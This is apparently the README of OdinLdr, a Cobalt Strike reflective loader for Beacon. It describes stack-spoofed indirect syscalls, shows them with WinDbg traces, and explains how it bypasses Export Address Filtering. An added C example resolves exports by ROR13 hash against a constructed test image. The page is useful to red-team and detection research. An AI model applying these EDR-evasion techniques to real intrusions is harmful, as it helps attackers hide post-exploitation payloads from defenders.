NtDallas/OdinLdr
OdinLdr

Cobalt Strike reflective loader for Beacon and postex DLLs.

UDRL (User-Defined Reflective Loader)

  • Indirect syscalls with a synthetic stack frame for NtAllocateVirtualMemory / NtProtectVirtualMemory. In the WinDbg `k` output below the syscall stub appears to return into KERNELBASE and the chain unwinds cleanly to RtlUserThreadStart, instead of returning into the loader's own unbacked memory:

```
 # Child-SP          RetAddr               Call Site
00 00000000`00cdf5d8 00007ffc`d9a12c66     ntdll!NtAllocateVirtualMemory+0x12
01 00000000`00cdf5e0 00007ffc`da8c7388     KERNELBASE!Internal_EnumSystemLocales+0x406
02 00000000`00cdf9c0 00007ffc`dbefcca5     KERNEL32!BaseThreadInitThunk+0x28
03 00000000`00cdf9f0 00000000`00000000     ntdll!RtlUserThreadStart+0x35
```

  • LoadLibraryA called through the same synthetic stack frame:

```
 # Child-SP          RetAddr               Call Site
00 00000000`00c3f518 00007ffc`d9a12c66     KERNEL32!LoadLibraryAStub
01 00000000`00c3f520 00007ffc`da8c7388     KERNELBASE!Internal_EnumSystemLocales+0x406
02 00000000`00c3f900 00007ffc`dbefcca5     KERNEL32!BaseThreadInitThunk+0x28
03 00000000`00c3f930 00000000`00000000     ntdll!RtlUserThreadStart+0x35
```

  • Module headers are read through a gadget so the loader does not trip Export Address Filtering (EAF). EAF sets hardware breakpoints on the export tables of key system modules and checks where the read originated; routing the read through code inside a legitimate module keeps its origin on-module rather than in the loader's allocation.

[Screenshots: Beacon_Eaf_Exec, Beacon_Eaf_Callback]
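The reads that EAF guards are the ones every reflective loader has to make: walk a module's DOS and NT headers to the export directory, then scan AddressOfNames / AddressOfNameOrdinals / AddressOfFunctions to resolve LoadLibraryA, NtAllocateVirtualMemory and friends by hash. The C below is an added example, not OdinLdr's code (which is not shown on this page): it implements that walk with hand-declared structures so it compiles without windows.h, and runs it against a constructed in-memory "module" whose three exports, forwarder entry and RVA layout are invented for the example. The structure layouts match the real IMAGE_DOS_HEADER / IMAGE_NT_HEADERS64 / IMAGE_EXPORT_DIRECTORY, so the same resolver works on a real mapped module; what it does not show is the gadget indirection, which is OdinLdr's Windows-specific detail.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Minimal PE structures, hand-declared so this compiles without windows.h.
   Field offsets match IMAGE_DOS_HEADER / IMAGE_NT_HEADERS64 / IMAGE_EXPORT_DIRECTORY. */
#pragma pack(push, 1)
typedef struct { uint16_t e_magic; uint8_t pad[58]; uint32_t e_lfanew; } dos_hdr_t;
typedef struct { uint32_t VirtualAddress, Size; } data_dir_t;
typedef struct {
    uint32_t   Signature;           /* "PE\0\0" */
    uint8_t    FileHeader[20];
    uint16_t   Magic;               /* 0x20b for PE32+ */
    uint8_t    opt_pad[110];        /* remaining optional-header fields up to DataDirectory */
    data_dir_t DataDirectory[16];   /* [0] is the export directory */
} nt_hdr64_t;
typedef struct {
    uint32_t Characteristics, TimeDateStamp;
    uint16_t MajorVersion, MinorVersion;
    uint32_t Name, Base, NumberOfFunctions, NumberOfNames;
    uint32_t AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals;
} export_dir_t;
#pragma pack(pop)

/* ROR13 string hash, the scheme Stephen Fewer's ReflectiveLoader uses so that
   no API names have to be stored in the loader itself. */
uint32_t ror13_hash(const char *s) {
    uint32_t h = 0;
    for (; *s; s++) { h = (h >> 13) | (h << 19); h += (uint8_t)*s; }
    return h;
}

/* Resolve an export by hash from a mapped image (RVAs are relative to base).
   Every dereference below (e_lfanew, the data directory, the three export
   arrays) is the kind of header/export-table read that EAF watches when it
   comes from outside a loaded module. A production loader would also bound
   every RVA against SizeOfImage before touching it. */
void *resolve_export_by_hash(const uint8_t *base, uint32_t want, const char **forwarder) {
    const dos_hdr_t *dos = (const dos_hdr_t *)base;
    if (dos->e_magic != 0x5a4d) return NULL;                        /* "MZ" */
    const nt_hdr64_t *nt = (const nt_hdr64_t *)(base + dos->e_lfanew);
    if (nt->Signature != 0x4550 || nt->Magic != 0x20b) return NULL; /* "PE", PE32+ */
    data_dir_t dir = nt->DataDirectory[0];
    if (dir.VirtualAddress == 0) return NULL;
    const export_dir_t *exp = (const export_dir_t *)(base + dir.VirtualAddress);
    const uint32_t *funcs = (const uint32_t *)(base + exp->AddressOfFunctions);
    const uint32_t *names = (const uint32_t *)(base + exp->AddressOfNames);
    const uint16_t *ords  = (const uint16_t *)(base + exp->AddressOfNameOrdinals);
    for (uint32_t i = 0; i < exp->NumberOfNames; i++) {
        if (ror13_hash((const char *)(base + names[i])) != want) continue;
        uint16_t ord = ords[i];                       /* unbiased index into AddressOfFunctions */
        if (ord >= exp->NumberOfFunctions) return NULL;
        uint32_t rva = funcs[ord];
        /* Forwarded export: the RVA points back inside the export directory at a
           "DLL.Func" string, not at code. Report it instead of "calling" the string. */
        if (rva >= dir.VirtualAddress && rva < dir.VirtualAddress + dir.Size) {
            if (forwarder) *forwarder = (const char *)(base + rva);
            return NULL;
        }
        return (void *)(base + rva);
    }
    return NULL;
}

/* Constructed test module (not a real DLL): three exports laid out with RVA == offset.
   HeapAlloc is a forwarder, as it really is in kernel32, to exercise that path. */
enum { IMG_SIZE = 0x2000, EXP_RVA = 0x200, CODE_RVA = 0x1000 };
uint8_t *build_test_image(void) {
    uint8_t *img = calloc(1, IMG_SIZE);
    dos_hdr_t *dos = (dos_hdr_t *)img;
    dos->e_magic = 0x5a4d; dos->e_lfanew = sizeof(dos_hdr_t);
    nt_hdr64_t *nt = (nt_hdr64_t *)(img + dos->e_lfanew);
    nt->Signature = 0x4550; nt->Magic = 0x20b;
    nt->DataDirectory[0].VirtualAddress = EXP_RVA;
    nt->DataDirectory[0].Size = 0x200;

    export_dir_t *exp = (export_dir_t *)(img + EXP_RVA);
    uint32_t *funcs = (uint32_t *)(img + EXP_RVA + 0x40);
    uint32_t *names = (uint32_t *)(img + EXP_RVA + 0x60);
    uint16_t *ords  = (uint16_t *)(img + EXP_RVA + 0x80);
    const char *export_names[3] = { "HeapAlloc", "LoadLibraryA", "VirtualAlloc" }; /* sorted, as in a real table */
    uint32_t cur = EXP_RVA + 0x100;                  /* strings live inside the directory range */
    for (int i = 0; i < 3; i++) {
        names[i] = cur; ords[i] = (uint16_t)i;
        strcpy((char *)(img + cur), export_names[i]);
        cur += (uint32_t)strlen(export_names[i]) + 1;
    }
    strcpy((char *)(img + cur), "NTDLL.RtlAllocateHeap");
    funcs[0] = cur;                                  /* HeapAlloc -> forwarder string */
    funcs[1] = CODE_RVA; funcs[2] = CODE_RVA + 0x10; /* LoadLibraryA, VirtualAlloc -> "code" */
    img[CODE_RVA] = 0xc3; img[CODE_RVA + 0x10] = 0xc3; /* placeholder bodies: ret */
    exp->Base = 1; exp->NumberOfFunctions = 3; exp->NumberOfNames = 3;
    exp->AddressOfFunctions = EXP_RVA + 0x40;
    exp->AddressOfNames = EXP_RVA + 0x60;
    exp->AddressOfNameOrdinals = EXP_RVA + 0x80;
    return img;
}

int main(void) {
    uint8_t *img = build_test_image();
    const char *fwd = NULL;
    void *p = resolve_export_by_hash(img, ror13_hash("LoadLibraryA"), &fwd);
    printf("LoadLibraryA -> base+0x%lx\n", (unsigned long)((uint8_t *)p - img));
    p = resolve_export_by_hash(img, ror13_hash("HeapAlloc"), &fwd);
    printf("HeapAlloc -> %s, forwarded to %s\n", p ? "code" : "no code", fwd ? fwd : "-");
    free(img);
    return 0;
}
```

Two points worth keeping in mind when porting this to a real loader: the ordinal table is an unbiased index into AddressOfFunctions (do not subtract `Base`), and forwarded exports must be followed into the named module rather than treated as code addresses.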

Credit

Thanks

  • m_101: tips on bypassing EAF
  • Tripané: help with debugging
